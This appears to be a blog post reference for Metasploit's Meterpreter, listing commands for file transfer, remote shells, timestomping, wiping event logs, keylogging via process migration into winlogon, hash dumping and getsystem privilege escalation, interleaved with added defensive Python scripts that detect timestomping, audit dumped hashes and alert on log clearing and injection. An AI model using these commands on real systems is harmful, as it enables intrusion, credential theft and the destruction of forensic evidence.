Hacking Tools: Metasploit | By Anonymous | July 30, 2019 - 16:03 | Posted in CyberGuerrilla


Metasploit

Metasploit is driven from the command line (msfconsole) and is used to compromise systems. Meterpreter is the Metasploit payload that gives an interactive shell on the remote computer; many of its commands mirror basic Linux commands, and they work the same whether the remote system runs Windows or another operating system.

Core commands

These are the so-called Core Commands:

Command     Meaning
?           Help menu.
background  Move the current session to the background to get back to the msf prompt or to access other sessions. Return to the session from the msf prompt with:

                msf > sessions -i <session #>

bgkill      Kill a meterpreter script running in the background.
bglist      List all scripts running in the background.
bgrun       Run a script as a background thread.
migrate     Move the active process to a designated PID. Useful for migrating the shell out of a low-level process into a process with higher-level access. Find the PID of a useful process and use:

                meterpreter > migrate <PID#>

run         Run the meterpreter script that follows.
channel     List active channels.
read        Read data from a channel.
write       Write data to a channel.
interact    Interact with a channel.
close       Close a channel.
exit        Exit a meterpreter session.
quit        Terminate the meterpreter session.
use         Load a meterpreter extension.
irb         Go into Ruby scripting mode.

For more, see the MSFconsole Core Commands Tutorial by Offensive Security.

File system commands

Once a meterpreter shell is running, the file system commands allow interaction with both the local and the remote file system.

ls          List the files in the current directory.

    meterpreter > ls

    Listing: C:\Documents and Settings\remote
    =========================================

    Mode              Size     Type  Last modified                   Name
    ----              ----     ----  -------------                   ----
    40777/rwxrwxrwx   0        dir   Wed Jan 10 08:21:10 -0600 2018  .
    40777/rwxrwxrwx   0        dir   Mon Feb 26 14:44:00 -0600 2018  ..
    100666/rw-rw-rw-  218      fil   Mon Sep 10 01:13:54 -0600 2018  .recently-used.xbel
    40555/r-xr-xr-x   0        dir   Wed Jun 13 10:12:21 -0700 2018  Application Data
    ...snip...

cat         Read the contents of a file and write them to stdout.

    meterpreter > cat edit.txt
    Whatever text is in the edit.txt file

When a Meterpreter shell is received, the local working directory is the directory from which the Metasploit console was started. Changing the local working directory gives the Meterpreter session access to the files located in that folder.

getwd       Print the working directory.
pwd         Print the working directory.
cd          Change directory on the remote machine.

    meterpreter > pwd
    c:\
    meterpreter > cd c:\windows
    meterpreter > pwd
    c:\windows
    meterpreter >

edit        Edit a file with vim.

    meterpreter > edit edit.txt

del         Delete a file on the remote machine.
download    Download a file from the remote system to the local system.

    meterpreter > download c:\\boot.ini

upload      Upload a file from the local system to the remote machine.

    meterpreter > upload some_trojan_code.exe c:\\windows\\system32
    [*] uploading  : some_trojan_code.exe -> c:\windows\system32
    [*] uploaded   : some_trojan_code.exe -> c:\windows\system32\some_trojan_code.exe
    meterpreter >

lpwd        Print the local working directory.
getlwd      Print the local working directory.
lcd         Change the local working directory.

    meterpreter > lpwd
    /root
    meterpreter > lcd /var/www
    meterpreter > lpwd
    /var/www
    meterpreter >

mkdir       Make a directory on the remote system.
rm          Remove (delete) a file.
rmdir       Remove a directory on the remote system.
timestomp   Modify a file's modified, accessed, and created (MAC) timestamps.
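From the defender's side, timestomp leaves a recognisable trace: when the new times are given as a time string, they are written at whole-second granularity, so the sub-second fraction that NTFS stores for every timestamp comes out as zero. The following is an added example, not code from the post; it scores constructed file records (shaped like os.stat output) with that heuristic plus the weaker "modified before created" signal, and includes a helper for real paths. The path names and timestamp values in the sample are made up.

```python
"""Heuristic check for timestamps that look timestomped (added example).

Signal 1: every timestamp has a zero sub-second part (timestomp set from a
          "MM/DD/YYYY HH:MM:SS" string cannot carry fractional seconds).
Signal 2: modified earlier than created. Weak on its own: ordinary file copies
          get a fresh creation time and keep the old modification time.
"""
import os
from dataclasses import dataclass
from datetime import datetime, timezone

NS = 1_000_000_000  # nanoseconds per second


@dataclass
class FileTimes:
    path: str
    modified_ns: int
    accessed_ns: int
    created_ns: int


def whole_seconds(ts_ns: int) -> bool:
    """True when the timestamp carries no sub-second component."""
    return ts_ns % NS == 0


def findings(ft: FileTimes) -> list:
    out = []
    if all(whole_seconds(t) for t in (ft.modified_ns, ft.accessed_ns, ft.created_ns)):
        out.append("all timestamps have a zero sub-second part")
    if ft.modified_ns < ft.created_ns:
        out.append("modified before created")
    return out


def scan(records) -> dict:
    """Map each suspicious path to its findings; clean files are left out."""
    report = {}
    for r in records:
        f = findings(r)
        if f:
            report[r.path] = f
    return report


def from_stat(path: str) -> FileTimes:
    """Build a record from a real file. Windows reports creation time in
    st_ctime; macOS/BSD expose st_birthtime_ns; Linux has neither, so
    signal 2 is meaningless there."""
    st = os.stat(path)
    created = getattr(st, "st_birthtime_ns", None)
    if created is None:
        created = st.st_ctime_ns
    return FileTimes(path, st.st_mtime_ns, st.st_atime_ns, created)


def ts(y, mo, d, h, mi, s, frac_ns=0) -> int:
    """Helper to build a UTC timestamp in nanoseconds for the sample data."""
    base = int(datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc).timestamp())
    return base * NS + frac_ns


# Constructed sample records (hypothetical paths and times).
SAMPLE = [
    # Normal file: fractional seconds present, created before last modified.
    FileTimes(r"C:\Documents and Settings\remote\notes.txt",
              ts(2018, 9, 10, 1, 13, 54, 123_456_700),
              ts(2018, 9, 10, 1, 14, 2, 88_123_400),
              ts(2018, 1, 10, 8, 21, 10, 50_000_000)),
    # Dropped binary whose MAC times were set from a time string to blend in.
    FileTimes(r"C:\WINDOWS\system32\some_trojan_code.exe",
              ts(2018, 1, 10, 8, 21, 10),
              ts(2018, 1, 10, 8, 21, 10),
              ts(2018, 1, 10, 8, 21, 10)),
    # Copied document: old modification time, new creation time, not stomped.
    FileTimes(r"C:\Documents and Settings\remote\copied.doc",
              ts(2017, 3, 3, 12, 0, 0, 500_000_000),
              ts(2019, 7, 30, 16, 3, 0, 12_345_600),
              ts(2019, 7, 30, 16, 3, 0, 12_345_600)),
]

if __name__ == "__main__":
    for path, why in scan(SAMPLE).items():
        print(path, "->", "; ".join(why))
```

Treat the output as a triage list, not a verdict: archives extracted from FAT-era formats also produce whole-second times, and the definitive check is to compare $STANDARD_INFORMATION against the $FILE_NAME timestamps in the MFT, which timestomp does not rewrite through the normal API.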

Basic system commands

sysinfo     Get details about the remote machine such as OS and host name.
getuid      Get the user ID that the meterpreter server is running as on the host.

    meterpreter > getuid

shell       Open a command shell on the remote machine.

    meterpreter > shell
    Process 39640 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

execute     Execute a command.

    meterpreter > execute -f cmd.exe -i -H

ps          List running processes.
getpid      Get the current shell's process ID (PID).
getprivs    Enable as many privileges as possible in the current process token.
kill        Kill the process designated by the PID.
reg         Interact with the registry of the remote Windows machine.
rev2self    Call RevertToSelf() on the remote Windows machine to terminate the impersonation of a client application.
steal_token Try to steal the token of the specified process (PID).
drop_token  Drop a stolen token.
clearev     Clear the Application, System, and Security logs on the remote Windows machine.

    meterpreter > clearev
    [*] Wiping 122 records from Application...
    [*] Wiping 815 records from System...
    [*] Wiping 0 records from Security...
    meterpreter >

reboot      Reboot the remote machine.
shutdown    Shut down the remote computer.

User interface

After having gained access to a system there are two approaches: smash and grab or low and slow. The latter can lead to a ton of useful information (passwords, user accounts). The keylogger tool allows for capturing all keyboard input from the system, without writing anything to disk and leaving a minimal forensic footprint.

keyscan_start  Start the software keylogger; use it after migrating into a process such as Word or a browser.
keyscan_stop   Stop the software keylogger.
keyscan_dump   Dump the contents of the software keylogger.

    meterpreter > ps

    Process list
    ============

        PID   Name               Path
        ---   ----               ----

    ...snip...
        768   Explorer.exe       C:\WINNT\Explorer.exe
    ...snip...
    meterpreter > migrate 768
    [*] Migrating to 768...
    [*] Migration completed successfully.
    meterpreter > getpid
    Current pid: 768
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
       somebank.com username password

To capture system login credentials, migrate into the winlogon process instead. This captures the credentials of every user logging into the system for as long as the keylogger is running.

idletime    Display the number of seconds that the user at the remote machine has been idle.

    meterpreter > idletime
    User has been idle for: 12 hours 17 mins 56 secs
    meterpreter >

Password dumping

hashdump    Dump the contents of the SAM database.

    meterpreter > run post/windows/gather/hashdump

    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY 112233445566778899eeeeeeeeeee...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hashes...

    Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
    Guest:501:zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
    meterpreter >

powerdump   Use PowerShell to extract user names and password hashes through registry keys. This script requires running as SYSTEM to work.
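The lines hashdump prints are in pwdump format, user:RID:LM hash:NT hash:::, and the same format is what an administrator gets back when auditing their own hosts. As an added example (not code from the post), the script below parses such output and reports the states worth fixing: accounts with an empty password, accounts that still have an LM hash stored, and accounts sharing one NT hash, i.e. the same password. The sample output is constructed; the hash values are the widely known LM/NT hashes of the empty string and of the word "password", not anything taken from the post.

```python
"""Audit pwdump-format output (user:RID:LM:NT:::) for weak account states.
Added example; sample lines below are constructed, not from any real host."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)


def parse_pwdump(text: str) -> list:
    """Return one dict per well-formed line; status lines and prompts are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["rid"] = int(e["rid"])
        e["lm"] = e["lm"].lower()
        e["nt"] = e["nt"].lower()
        entries.append(e)
    return entries


def audit(entries: list) -> dict:
    """Map each account with a problem to its list of findings."""
    by_nt = defaultdict(list)          # NT hash -> accounts using it
    for e in entries:
        by_nt[e["nt"]].append(e["user"])

    report = {}
    for e in entries:
        findings = []
        if e["nt"] == EMPTY_NT:
            findings.append("empty password")
        if e["lm"] != EMPTY_LM:
            findings.append("LM hash stored (LM hashing still enabled for this account)")
        others = sorted(u for u in by_nt[e["nt"]] if u != e["user"])
        if others and e["nt"] != EMPTY_NT:
            findings.append("same password as: " + ", ".join(others))
        if findings:
            report[e["user"]] = findings
    return report


# Constructed sample in the shape of the hashdump session above.
SAMPLE_OUTPUT = """\
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
meterpreter >
"""

if __name__ == "__main__":
    for user, why in audit(parse_pwdump(SAMPLE_OUTPUT)).items():
        print(f"{user}: " + "; ".join(why))
```

A disabled built-in Guest account with an empty NT hash is normal and can be filtered out by RID; the shared-hash finding is the one that usually matters, because a local administrator password reused across machines is what turns one compromised host into many.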

Privilege escalation

Having only limited user rights can severely restrict what can be done on the remote system, such as dumping passwords, manipulating the registry, installing backdoors, and so forth. Metasploit has a script called getsystem that uses a number of different techniques to attempt to gain SYSTEM-level privileges on the remote system.

getsystem   Use 15 built-in methods to gain SYSTEM privileges.

    meterpreter > getuid
    Server username: SOMETHINGUNUSEFUL\user
    meterpreter > use priv
    Loading extension priv...success.
    meterpreter > getsystem -h
    Usage: getsystem [options]

    Attempt to elevate your privilege to that of local system.

    OPTIONS:

        -h        Help Banner.
        -t <opt>  The technique to use. (Default to '0').
                  0 : All techniques available
                  1 : Service - Named Pipe Impersonation (In Memory/Admin)
                  2 : Service - Named Pipe Impersonation (Dropper/Admin)
                  3 : Service - Token Duplication (In Memory/Admin)

    meterpreter > getsystem
    ...got system (via technique 1).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

Or:

    meterpreter > getsystem
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter >

There are also other (local) exploits that can be used to escalate privileges if getsystem fails. The available exploits change over time.
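Each of the actions documented above leaves Windows event-log evidence that a defender can alert on: clearev produces Security event 1102 and System event 104 (the log-cleared records survive the wipe because they are written after it), migrate and keyscan into explorer.exe or winlogon.exe show up as Sysmon CreateRemoteThread (event 8) and ProcessAccess (event 10), and getsystem technique 1 installs a short-lived service whose ImagePath is the telltale "cmd.exe /c echo <random> > \\.\pipe\<random>" (System event 7045). The following is an added example, not code from the post, covering the clearev, keylogger and getsystem passages together. The event records are constructed and shaped like the parsed EventData of the real events; the allowlist of processes permitted to open handles to winlogon.exe and lsass.exe is an assumption to tune per environment.

```python
"""Detect log clearing, process injection into logon processes, and the
getsystem named-pipe service from parsed Windows event records (added example)."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    channel: str   # "Security", "System" or "Microsoft-Windows-Sysmon/Operational"
    event_id: int
    data: dict     # EventData / UserData fields, already parsed out of the XML


# ImagePath written by getsystem technique 1:  cmd.exe /c echo <rand> > \\.\pipe\<rand>
GETSYSTEM_SVC = re.compile(r"cmd(\.exe)?\s+/c\s+echo\s+\S+\s*>\s*\\\\\.\\pipe\\\S+", re.I)

THREAD_TARGETS = {"winlogon.exe", "explorer.exe", "lsass.exe"}  # Sysmon 8 targets worth an alert
ACCESS_TARGETS = {"winlogon.exe", "lsass.exe"}                  # Sysmon 10 (explorer.exe is too noisy)
ACCESS_ALLOWLIST = {r"c:\windows\system32\csrss.exe",           # assumed benign handle openers
                    r"c:\windows\system32\lsass.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(ev: Event):
    """Return an alert string for one event, or None if it is not interesting."""
    d = ev.data
    if ev.channel == "Security" and ev.event_id == 1102:
        return f"Security log cleared by {d.get('SubjectUserName', '?')}"
    if ev.channel == "System" and ev.event_id == 104:
        return f"{d.get('Channel', '?')} log cleared by {d.get('SubjectUserName', '?')}"
    if ev.channel == "System" and ev.event_id == 7045 and GETSYSTEM_SVC.search(d.get("ImagePath", "")):
        return f"getsystem-style service {d.get('ServiceName', '?')}: {d['ImagePath']}"
    if ev.channel.startswith("Microsoft-Windows-Sysmon"):
        target, source = basename(d.get("TargetImage", "")), d.get("SourceImage", "")
        if ev.event_id == 8 and target in THREAD_TARGETS:
            return f"remote thread created in {target} by {source}"
        if ev.event_id == 10 and target in ACCESS_TARGETS and source.lower() not in ACCESS_ALLOWLIST:
            return f"handle to {target} opened by {source} (access {d.get('GrantedAccess', '?')})"
    return None


def detect(events) -> list:
    """Run every event through analyse() and keep the alerts, in log order."""
    return [alert for alert in map(analyse, events) if alert]


# Constructed sample records mirroring the sessions in the post (names made up).
SYSMON = "Microsoft-Windows-Sysmon/Operational"
DROPPED = r"C:\Documents and Settings\remote\some_trojan_code.exe"
SAMPLE_EVENTS = [
    Event("Security", 4624, {"TargetUserName": "remote", "LogonType": "2"}),          # benign logon
    Event("Security", 1102, {"SubjectUserName": "remote", "SubjectDomainName": "SOMETHINGUNUSEFUL"}),
    Event("System", 104, {"Channel": "Application", "SubjectUserName": "remote"}),
    Event("System", 7045, {"ServiceName": "ogbxw", "StartType": "demand start",
                           "ImagePath": r"cmd.exe /c echo ogbxw > \\.\pipe\ogbxw"}),
    Event("System", 7045, {"ServiceName": "Sysmon", "StartType": "auto start",
                           "ImagePath": r"C:\Windows\Sysmon.exe"}),                    # benign install
    Event(SYSMON, 8, {"SourceImage": DROPPED, "TargetImage": r"C:\WINNT\Explorer.exe"}),
    Event(SYSMON, 10, {"SourceImage": DROPPED, "TargetImage": r"C:\WINNT\system32\winlogon.exe",
                       "GrantedAccess": "0x1FFFFF"}),
    Event(SYSMON, 10, {"SourceImage": r"C:\Windows\system32\csrss.exe",                # allowlisted
                       "TargetImage": r"C:\Windows\system32\winlogon.exe", "GrantedAccess": "0x1FFFFF"}),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Forwarding these channels off the host before they can be cleared is what makes the 1102/104 rule useful: once clearev has run, the only copies of the 122 Application and 815 System records shown above are wherever the collector sent them.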
